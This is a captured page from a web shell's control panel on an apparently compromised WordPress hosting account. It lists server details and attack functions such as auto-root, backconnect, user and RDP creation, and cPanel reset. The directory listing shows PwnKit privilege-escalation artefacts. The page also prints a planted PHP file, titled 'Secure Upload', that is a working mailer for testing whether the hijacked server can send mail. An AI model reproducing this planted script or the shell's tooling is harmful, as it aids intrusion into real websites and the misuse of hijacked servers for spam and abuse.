Linux server292.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
LiteSpeed
: 162.0.235.5 | : 216.73.216.85
Cant Read [ /etc/named.conf ]
8.3.25
comfsblg
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
comfsblg /
unffe1 /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
wp-admin
[ DIR ]
drwxr-xr-x
wp-content
[ DIR ]
drwxr-xr-x
wp-includes
[ DIR ]
drwxr-xr-x
.hcflag
31
B
-rw-r--r--
.htaccess
2.15
KB
-rw-r--r--
.litespeed_flag
297
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
.user.ini
587
B
-rw-r--r--
error_log
0
B
-rw-r--r--
land_line.php
2.12
KB
-rw-r--r--
license.txt
19.45
KB
-rw-r--r--
php.ini
581
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
readme.html
7.24
KB
-rw-r--r--
wp-activate.php
7.21
KB
-rw-r--r--
wp-admin.zip
677.23
MB
-rw-r--r--
wp-blog-header.php
351
B
-rw-r--r--
wp-comments-post.php
2.27
KB
-rw-r--r--
wp-config-sample.php
2.96
KB
-rw-r--r--
wp-config.php
3.08
KB
-rw-r--r--
wp-cron.php
5.51
KB
-rw-r--r--
wp-links-opml.php
2.44
KB
-rw-r--r--
wp-load.php
3.84
KB
-rw-r--r--
wp-login.php
50.04
KB
-rw-r--r--
wp-mail.php
8.33
KB
-rw-r--r--
wp-settings.php
28.1
KB
-rw-r--r--
wp-signup.php
33.58
KB
-rw-r--r--
wp-trackback.php
4.77
KB
-rw-r--r--
xmlrpc.php
3.17
KB
-rw-r--r--
zzarxatton.php
2.2
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : zzarxatton.php
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="Content-Security-Policy" content="default-src 'self';"> <title>Secure Upload</title> <style> body { font-family: Arial, sans-serif; margin: 2rem; background-color: #f9f9f9; color: #333; } form { display: flex; flex-direction: column; width: 300px; margin: auto; } input[type="text"] { margin-bottom: 1rem; padding: 0.5rem; border: 1px solid #ccc; border-radius: 5px; } input[type="submit"] { padding: 0.5rem; background-color: #007bff; color: #fff; border: none; border-radius: 5px; cursor: pointer; } input[type="submit"]:hover { background-color: #0056b3; } </style> </head> <body> <h2>Upload Is Working Now Test Send</h2> <form method="post" action=""> <input type="text" placeholder="email" name="email" required> <input type="text" placeholder="ID" name="orderid"> <input type="submit" value="Send"> </form> <?php if ($_SERVER['REQUEST_METHOD'] === 'POST' && !empty($_POST['email'])) { $email = filter_var($_POST['email'], FILTER_SANITIZE_EMAIL); $orderid = !empty($_POST['orderid']) ? trim($_POST['orderid']) : rand(); if (filter_var($email, FILTER_VALIDATE_EMAIL)) { $subject = $_SERVER['HTTP_HOST'] . " - Sending is Working Fine. [Result] ID: (" . $orderid . ")"; $message = "Order ID: " . htmlspecialchars($orderid); $headers = "From: no-reply@" . $_SERVER['HTTP_HOST'] . "\r\n"; mail($email, $subject, $message, $headers); echo "<b>Send a report to [" . htmlspecialchars($email) . "] - ID: " . htmlspecialchars($orderid) . "</b>"; } else { echo "<b>Invalid email address.</b>"; } } ?> </body> </html>
Close